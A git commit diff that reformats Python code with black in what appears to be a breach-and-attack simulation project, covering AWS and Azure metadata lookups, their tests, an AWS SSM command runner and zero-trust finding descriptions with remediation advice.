Fixed screwed up formatting with black

This commit is contained in:
VakarisZ 2021-04-07 11:13:49 +03:00 committed by Mike Salvatore
parent 03bcfc97af
commit 3149dcc8ec
329 changed files with 5482 additions and 5603 deletions

View File

@ -48,8 +48,7 @@ class AwsInstance(CloudInstance):
try:
self.account_id = self._extract_account_id(
requests.get(
AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document",
timeout=2
AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document", timeout=2
).text
)
except (requests.RequestException, json.decoder.JSONDecodeError, IOError) as e:

View File

@ -20,10 +20,10 @@ logger = logging.getLogger(__name__)
def filter_instance_data_from_aws_response(response):
return [
{
"instance_id":x[INSTANCE_ID_KEY],
"name":x[COMPUTER_NAME_KEY],
"os":x[PLATFORM_TYPE_KEY].lower(),
"ip_address":x[IP_ADDRESS_KEY],
"instance_id": x[INSTANCE_ID_KEY],
"name": x[COMPUTER_NAME_KEY],
"os": x[PLATFORM_TYPE_KEY].lower(),
"ip_address": x[IP_ADDRESS_KEY],
}
for x in response[INSTANCE_INFORMATION_LIST_KEY]
]

View File

@ -38,8 +38,8 @@ EXPECTED_ACCOUNT_ID = "123456789012"
def get_test_aws_instance(
text={"instance_id":None, "region":None, "account_id":None},
exception={"instance_id":None, "region":None, "account_id":None},
text={"instance_id": None, "region": None, "account_id": None},
exception={"instance_id": None, "region": None, "account_id": None},
):
with requests_mock.Mocker() as m:
# request made to get instance_id
@ -67,9 +67,9 @@ def get_test_aws_instance(
def good_data_mock_instance():
return get_test_aws_instance(
text={
"instance_id":INSTANCE_ID_RESPONSE,
"region":AVAILABILITY_ZONE_RESPONSE,
"account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
"instance_id": INSTANCE_ID_RESPONSE,
"region": AVAILABILITY_ZONE_RESPONSE,
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
}
)
@ -99,9 +99,9 @@ def test_get_account_id_good_data(good_data_mock_instance):
def bad_region_data_mock_instance():
return get_test_aws_instance(
text={
"instance_id":INSTANCE_ID_RESPONSE,
"region":"in-a-different-world",
"account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
"instance_id": INSTANCE_ID_RESPONSE,
"region": "in-a-different-world",
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
}
)
@ -131,9 +131,9 @@ def test_get_account_id_bad_region_data(bad_region_data_mock_instance):
def bad_account_id_data_mock_instance():
return get_test_aws_instance(
text={
"instance_id":INSTANCE_ID_RESPONSE,
"region":AVAILABILITY_ZONE_RESPONSE,
"account_id":"who-am-i",
"instance_id": INSTANCE_ID_RESPONSE,
"region": AVAILABILITY_ZONE_RESPONSE,
"account_id": "who-am-i",
}
)
@ -163,11 +163,11 @@ def test_get_account_id_data_bad_account_id_data(bad_account_id_data_mock_instan
def bad_instance_id_request_mock_instance(instance_id_exception):
return get_test_aws_instance(
text={
"instance_id":None,
"region":AVAILABILITY_ZONE_RESPONSE,
"account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
"instance_id": None,
"region": AVAILABILITY_ZONE_RESPONSE,
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
},
exception={"instance_id":instance_id_exception, "region":None, "account_id":None},
exception={"instance_id": instance_id_exception, "region": None, "account_id": None},
)
@ -201,11 +201,11 @@ def test_get_account_id_bad_instance_id_request(bad_instance_id_request_mock_ins
def bad_region_request_mock_instance(region_exception):
return get_test_aws_instance(
text={
"instance_id":INSTANCE_ID_RESPONSE,
"region":None,
"account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
"instance_id": INSTANCE_ID_RESPONSE,
"region": None,
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
},
exception={"instance_id":None, "region":region_exception, "account_id":None},
exception={"instance_id": None, "region": region_exception, "account_id": None},
)
@ -239,11 +239,11 @@ def test_get_account_id_bad_region_request(bad_region_request_mock_instance):
def bad_account_id_request_mock_instance(account_id_exception):
return get_test_aws_instance(
text={
"instance_id":INSTANCE_ID_RESPONSE,
"region":AVAILABILITY_ZONE_RESPONSE,
"account_id":None,
"instance_id": INSTANCE_ID_RESPONSE,
"region": AVAILABILITY_ZONE_RESPONSE,
"account_id": None,
},
exception={"instance_id":None, "region":None, "account_id":account_id_exception},
exception={"instance_id": None, "region": None, "account_id": account_id_exception},
)

View File

@ -54,5 +54,5 @@ class TestFilterInstanceDataFromAwsResponse(TestCase):
)
self.assertEqual(
filter_instance_data_from_aws_response(json.loads(json_response_full)),
[{"instance_id":"string", "ip_address":"string", "name":"string", "os":"string"}],
[{"instance_id": "string", "ip_address": "string", "name": "string", "os": "string"}],
)

View File

@ -9,8 +9,7 @@ from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT
LATEST_AZURE_METADATA_API_VERSION = "2019-04-30"
AZURE_METADATA_SERVICE_URL = (
"http://169.254.169.254/metadata/instance?api-version=%s" %
LATEST_AZURE_METADATA_API_VERSION
"http://169.254.169.254/metadata/instance?api-version=%s" % LATEST_AZURE_METADATA_API_VERSION
)
logger = logging.getLogger(__name__)
@ -41,7 +40,7 @@ class AzureInstance(CloudInstance):
try:
response = requests.get(
AZURE_METADATA_SERVICE_URL,
headers={"Metadata":"true"},
headers={"Metadata": "true"},
timeout=SHORT_REQUEST_TIMEOUT,
)

View File

@ -7,96 +7,96 @@ from common.cloud.azure.azure_instance import AZURE_METADATA_SERVICE_URL, AzureI
from common.cloud.environment_names import Environment
GOOD_DATA = {
"compute":{
"azEnvironment":"AZUREPUBLICCLOUD",
"isHostCompatibilityLayerVm":"true",
"licenseType":"Windows_Client",
"location":"westus",
"name":"examplevmname",
"offer":"Windows",
"osProfile":{
"adminUsername":"admin",
"computerName":"examplevmname",
"disablePasswordAuthentication":"true",
"compute": {
"azEnvironment": "AZUREPUBLICCLOUD",
"isHostCompatibilityLayerVm": "true",
"licenseType": "Windows_Client",
"location": "westus",
"name": "examplevmname",
"offer": "Windows",
"osProfile": {
"adminUsername": "admin",
"computerName": "examplevmname",
"disablePasswordAuthentication": "true",
},
"osType":"linux",
"placementGroupId":"f67c14ab-e92c-408c-ae2d-da15866ec79a",
"plan":{"name":"planName", "product":"planProduct", "publisher":"planPublisher"},
"platformFaultDomain":"36",
"platformUpdateDomain":"42",
"publicKeys":[
{"keyData":"ssh-rsa 0", "path":"/home/user/.ssh/authorized_keys0"},
{"keyData":"ssh-rsa 1", "path":"/home/user/.ssh/authorized_keys1"},
"osType": "linux",
"placementGroupId": "f67c14ab-e92c-408c-ae2d-da15866ec79a",
"plan": {"name": "planName", "product": "planProduct", "publisher": "planPublisher"},
"platformFaultDomain": "36",
"platformUpdateDomain": "42",
"publicKeys": [
{"keyData": "ssh-rsa 0", "path": "/home/user/.ssh/authorized_keys0"},
{"keyData": "ssh-rsa 1", "path": "/home/user/.ssh/authorized_keys1"},
],
"publisher":"RDFE-Test-Microsoft-Windows-Server-Group",
"resourceGroupName":"macikgo-test-may-23",
"resourceId":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test"
"publisher": "RDFE-Test-Microsoft-Windows-Server-Group",
"resourceGroupName": "macikgo-test-may-23",
"resourceId": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test"
"-may-23/"
"providers/Microsoft.Compute/virtualMachines/examplevmname",
"securityProfile":{"secureBootEnabled":"true", "virtualTpmEnabled":"false"},
"sku":"Windows-Server-2012-R2-Datacenter",
"storageProfile":{
"dataDisks":[
"securityProfile": {"secureBootEnabled": "true", "virtualTpmEnabled": "false"},
"sku": "Windows-Server-2012-R2-Datacenter",
"storageProfile": {
"dataDisks": [
{
"caching":"None",
"createOption":"Empty",
"diskSizeGB":"1024",
"image":{"uri":""},
"lun":"0",
"managedDisk":{
"id":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
"caching": "None",
"createOption": "Empty",
"diskSizeGB": "1024",
"image": {"uri": ""},
"lun": "0",
"managedDisk": {
"id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
"resourceGroups/macikgo-test-may-23/providers/"
"Microsoft.Compute/disks/exampledatadiskname",
"storageAccountType":"Standard_LRS",
"storageAccountType": "Standard_LRS",
},
"name":"exampledatadiskname",
"vhd":{"uri":""},
"writeAcceleratorEnabled":"false",
"name": "exampledatadiskname",
"vhd": {"uri": ""},
"writeAcceleratorEnabled": "false",
}
],
"imageReference":{
"id":"",
"offer":"UbuntuServer",
"publisher":"Canonical",
"sku":"16.04.0-LTS",
"version":"latest",
"imageReference": {
"id": "",
"offer": "UbuntuServer",
"publisher": "Canonical",
"sku": "16.04.0-LTS",
"version": "latest",
},
"osDisk":{
"caching":"ReadWrite",
"createOption":"FromImage",
"diskSizeGB":"30",
"diffDiskSettings":{"option":"Local"},
"encryptionSettings":{"enabled":"false"},
"image":{"uri":""},
"managedDisk":{
"id":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
"osDisk": {
"caching": "ReadWrite",
"createOption": "FromImage",
"diskSizeGB": "30",
"diffDiskSettings": {"option": "Local"},
"encryptionSettings": {"enabled": "false"},
"image": {"uri": ""},
"managedDisk": {
"id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
"resourceGroups/macikgo-test-may-23/providers/"
"Microsoft.Compute/disks/exampleosdiskname",
"storageAccountType":"Standard_LRS",
"storageAccountType": "Standard_LRS",
},
"name":"exampleosdiskname",
"osType":"Linux",
"vhd":{"uri":""},
"writeAcceleratorEnabled":"false",
"name": "exampleosdiskname",
"osType": "Linux",
"vhd": {"uri": ""},
"writeAcceleratorEnabled": "false",
},
},
"subscriptionId":"xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx",
"tags":"baz:bash;foo:bar",
"version":"15.05.22",
"vmId":"02aab8a4-74ef-476e-8182-f6d2ba4166a6",
"vmScaleSetName":"crpteste9vflji9",
"vmSize":"Standard_A3",
"zone":"",
"subscriptionId": "xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx",
"tags": "baz:bash;foo:bar",
"version": "15.05.22",
"vmId": "02aab8a4-74ef-476e-8182-f6d2ba4166a6",
"vmScaleSetName": "crpteste9vflji9",
"vmSize": "Standard_A3",
"zone": "",
},
"network":{
"interface":[
"network": {
"interface": [
{
"ipv4":{
"ipAddress":[{"privateIpAddress":"10.144.133.132", "publicIpAddress":""}],
"subnet":[{"address":"10.144.133.128", "prefix":"26"}],
"ipv4": {
"ipAddress": [{"privateIpAddress": "10.144.133.132", "publicIpAddress": ""}],
"subnet": [{"address": "10.144.133.128", "prefix": "26"}],
},
"ipv6":{"ipAddress":[]},
"macAddress":"0011AAFFBB22",
"ipv6": {"ipAddress": []},
"macAddress": "0011AAFFBB22",
}
]
},
@ -113,7 +113,7 @@ javascript\">\nvar pageName = '/';\ntop.location.replace(pageName);\n</script>\n
"</body>\n</html>\n"
)
BAD_DATA_JSON = {"":""}
BAD_DATA_JSON = {"": ""}
def get_test_azure_instance(url, **kwargs):

View File

@ -39,7 +39,7 @@ class AwsCmdRunner(CmdRunner):
doc_name = "AWS-RunShellScript" if self.is_linux else "AWS-RunPowerShellScript"
command_res = self.ssm.send_command(
DocumentName=doc_name,
Parameters={"commands":[command_line]},
Parameters={"commands": [command_line]},
InstanceIds=[self.instance_id],
)
return command_res["Command"]["CommandId"]

View File

@ -81,24 +81,24 @@ PRINCIPLE_DISASTER_RECOVERY = "data_backup"
PRINCIPLE_SECURE_AUTHENTICATION = "secure_authentication"
PRINCIPLE_MONITORING_AND_LOGGING = "monitoring_and_logging"
PRINCIPLES = {
PRINCIPLE_SEGMENTATION:"Apply segmentation and micro-segmentation inside your "
PRINCIPLE_SEGMENTATION: "Apply segmentation and micro-segmentation inside your "
""
""
"network.",
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC:"Analyze network traffic for malicious activity.",
PRINCIPLE_USER_BEHAVIOUR:"Adopt security user behavior analytics.",
PRINCIPLE_ENDPOINT_SECURITY:"Use anti-virus and other traditional endpoint "
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC: "Analyze network traffic for malicious activity.",
PRINCIPLE_USER_BEHAVIOUR: "Adopt security user behavior analytics.",
PRINCIPLE_ENDPOINT_SECURITY: "Use anti-virus and other traditional endpoint "
"security solutions.",
PRINCIPLE_DATA_CONFIDENTIALITY:"Ensure data's confidentiality by encrypting it.",
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES:"Configure network policies to be as restrictive as "
PRINCIPLE_DATA_CONFIDENTIALITY: "Ensure data's confidentiality by encrypting it.",
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: "Configure network policies to be as restrictive as "
"possible.",
PRINCIPLE_USERS_MAC_POLICIES:"Users' permissions to the network and to resources "
PRINCIPLE_USERS_MAC_POLICIES: "Users' permissions to the network and to resources "
"should be MAC (Mandatory "
"Access Control) only.",
PRINCIPLE_DISASTER_RECOVERY:"Ensure data and infrastructure backups for disaster "
PRINCIPLE_DISASTER_RECOVERY: "Ensure data and infrastructure backups for disaster "
"recovery scenarios.",
PRINCIPLE_SECURE_AUTHENTICATION:"Ensure secure authentication process's.",
PRINCIPLE_MONITORING_AND_LOGGING:"Ensure monitoring and logging in network resources.",
PRINCIPLE_SECURE_AUTHENTICATION: "Ensure secure authentication process's.",
PRINCIPLE_MONITORING_AND_LOGGING: "Ensure monitoring and logging in network resources.",
}
POSSIBLE_STATUSES_KEY = "possible_statuses"
@ -107,206 +107,206 @@ PRINCIPLE_KEY = "principle_key"
FINDING_EXPLANATION_BY_STATUS_KEY = "finding_explanation"
TEST_EXPLANATION_KEY = "explanation"
TESTS_MAP = {
TEST_SEGMENTATION:{
TEST_EXPLANATION_KEY:"The Monkey tried to scan and find machines that it can "
TEST_SEGMENTATION: {
TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can "
"communicate with from the machine it's "
"running on, that belong to different network segments.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey performed cross-segment communication. Check firewall rules and"
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and"
" logs.",
STATUS_PASSED:"Monkey couldn't perform cross-segment communication. If relevant, "
STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, "
"check firewall logs.",
},
PRINCIPLE_KEY:PRINCIPLE_SEGMENTATION,
PILLARS_KEY:[NETWORKS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED],
PRINCIPLE_KEY: PRINCIPLE_SEGMENTATION,
PILLARS_KEY: [NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED],
},
TEST_MALICIOUS_ACTIVITY_TIMELINE:{
TEST_EXPLANATION_KEY:"The Monkeys in the network performed malicious-looking "
TEST_MALICIOUS_ACTIVITY_TIMELINE: {
TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking "
"actions, like scanning and attempting "
"exploitation.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_VERIFY:"Monkey performed malicious actions in the network. Check SOC logs and "
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and "
"alerts."
},
PRINCIPLE_KEY:PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
PILLARS_KEY:[NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_VERIFY],
PRINCIPLE_KEY: PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
},
TEST_ENDPOINT_SECURITY_EXISTS:{
TEST_EXPLANATION_KEY:"The Monkey checked if there is an active process of an "
TEST_ENDPOINT_SECURITY_EXISTS: {
TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an "
"endpoint security software.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey didn't find ANY active endpoint security processes. Install and "
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and "
"activate anti-virus "
"software on endpoints.",
STATUS_PASSED:"Monkey found active endpoint security processes. Check their logs to "
STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to "
"see if Monkey was a "
"security concern. ",
},
PRINCIPLE_KEY:PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY:[DEVICES],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY: [DEVICES],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_MACHINE_EXPLOITED:{
TEST_EXPLANATION_KEY:"The Monkey tries to exploit machines in order to "
TEST_MACHINE_EXPLOITED: {
TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to "
"breach them and propagate in the network.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey successfully exploited endpoints. Check IDS/IPS logs to see "
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see "
"activity recognized and see "
"which endpoints were compromised.",
STATUS_PASSED:"Monkey didn't manage to exploit an endpoint.",
STATUS_PASSED: "Monkey didn't manage to exploit an endpoint.",
},
PRINCIPLE_KEY:PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY:[DEVICES],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY],
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY: [DEVICES],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY],
},
TEST_SCHEDULED_EXECUTION:{
TEST_EXPLANATION_KEY:"The Monkey was executed in a scheduled manner.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_VERIFY:"Monkey was executed in a scheduled manner. Locate this activity in "
TEST_SCHEDULED_EXECUTION: {
TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in "
"User-Behavior security "
"software.",
STATUS_PASSED:"Monkey failed to execute in a scheduled manner.",
STATUS_PASSED: "Monkey failed to execute in a scheduled manner.",
},
PRINCIPLE_KEY:PRINCIPLE_USER_BEHAVIOUR,
PILLARS_KEY:[PEOPLE, NETWORKS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_VERIFY],
PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
PILLARS_KEY: [PEOPLE, NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
},
TEST_DATA_ENDPOINT_ELASTIC:{
TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to "
TEST_DATA_ENDPOINT_ELASTIC: {
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to "
"ElasticSearch instances.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey accessed ElasticSearch instances. Limit access to data by "
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by "
"encrypting it in in-transit.",
STATUS_PASSED:"Monkey didn't find open ElasticSearch instances. If you have such "
STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such "
"instances, look for alerts "
"that indicate attempts to access them. ",
},
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY:[DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_DATA_ENDPOINT_HTTP:{
TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to HTTP " "servers.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey accessed HTTP servers. Limit access to data by encrypting it in"
TEST_DATA_ENDPOINT_HTTP: {
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP " "servers.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in"
" in-transit.",
STATUS_PASSED:"Monkey didn't find open HTTP servers. If you have such servers, "
STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, "
"look for alerts that indicate "
"attempts to access them. ",
},
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY:[DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_DATA_ENDPOINT_POSTGRESQL:{
TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to " "PostgreSQL servers.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey accessed PostgreSQL servers. Limit access to data by encrypting"
TEST_DATA_ENDPOINT_POSTGRESQL: {
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to " "PostgreSQL servers.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed PostgreSQL servers. Limit access to data by encrypting"
" it in in-transit.",
STATUS_PASSED:"Monkey didn't find open PostgreSQL servers. If you have such servers, "
STATUS_PASSED: "Monkey didn't find open PostgreSQL servers. If you have such servers, "
"look for alerts that "
"indicate attempts to access them. ",
},
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY:[DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_TUNNELING:{
TEST_EXPLANATION_KEY:"The Monkey tried to tunnel traffic using other monkeys.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey tunneled its traffic using other monkeys. Your network policies "
TEST_TUNNELING: {
TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies "
"are too permissive - "
"restrict them. "
},
PRINCIPLE_KEY:PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY:[NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED],
PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED],
},
TEST_COMMUNICATE_AS_NEW_USER:{
TEST_EXPLANATION_KEY:"The Monkey tried to create a new user and communicate "
TEST_COMMUNICATE_AS_NEW_USER: {
TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate "
"with the internet from it.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey caused a new user to access the network. Your network policies "
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies "
"are too permissive - "
"restrict them to MAC only.",
STATUS_PASSED:"Monkey wasn't able to cause a new user to access the network.",
STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network.",
},
PRINCIPLE_KEY:PRINCIPLE_USERS_MAC_POLICIES,
PILLARS_KEY:[PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
PILLARS_KEY: [PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES:{
TEST_EXPLANATION_KEY:"ScoutSuite assessed cloud firewall rules and settings.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found overly permissive firewall rules.",
STATUS_PASSED:"ScoutSuite found no problems with cloud firewall rules.",
TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES: {
TEST_EXPLANATION_KEY: "ScoutSuite assessed cloud firewall rules and settings.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found overly permissive firewall rules.",
STATUS_PASSED: "ScoutSuite found no problems with cloud firewall rules.",
},
PRINCIPLE_KEY:PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY:[NETWORKS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY: [NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_UNENCRYPTED_DATA:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for resources containing " "unencrypted data.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found resources with unencrypted data.",
STATUS_PASSED:"ScoutSuite found no resources with unencrypted data.",
TEST_SCOUTSUITE_UNENCRYPTED_DATA: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for resources containing " "unencrypted data.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found resources with unencrypted data.",
STATUS_PASSED: "ScoutSuite found no resources with unencrypted data.",
},
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY:[DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_DATA_LOSS_PREVENTION:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for resources which are not "
TEST_SCOUTSUITE_DATA_LOSS_PREVENTION: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for resources which are not "
"protected against data loss.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found resources not protected against data loss.",
STATUS_PASSED:"ScoutSuite found that all resources are secured against data loss.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found resources not protected against data loss.",
STATUS_PASSED: "ScoutSuite found that all resources are secured against data loss.",
},
PRINCIPLE_KEY:PRINCIPLE_DISASTER_RECOVERY,
PILLARS_KEY:[DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_DISASTER_RECOVERY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_SECURE_AUTHENTICATION:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for issues related to users' " "authentication.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found issues related to users' authentication.",
STATUS_PASSED:"ScoutSuite found no issues related to users' authentication.",
TEST_SCOUTSUITE_SECURE_AUTHENTICATION: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for issues related to users' " "authentication.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found issues related to users' authentication.",
STATUS_PASSED: "ScoutSuite found no issues related to users' authentication.",
},
PRINCIPLE_KEY:PRINCIPLE_SECURE_AUTHENTICATION,
PILLARS_KEY:[PEOPLE, WORKLOADS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_SECURE_AUTHENTICATION,
PILLARS_KEY: [PEOPLE, WORKLOADS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_RESTRICTIVE_POLICIES:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for permissive user access " "policies.",
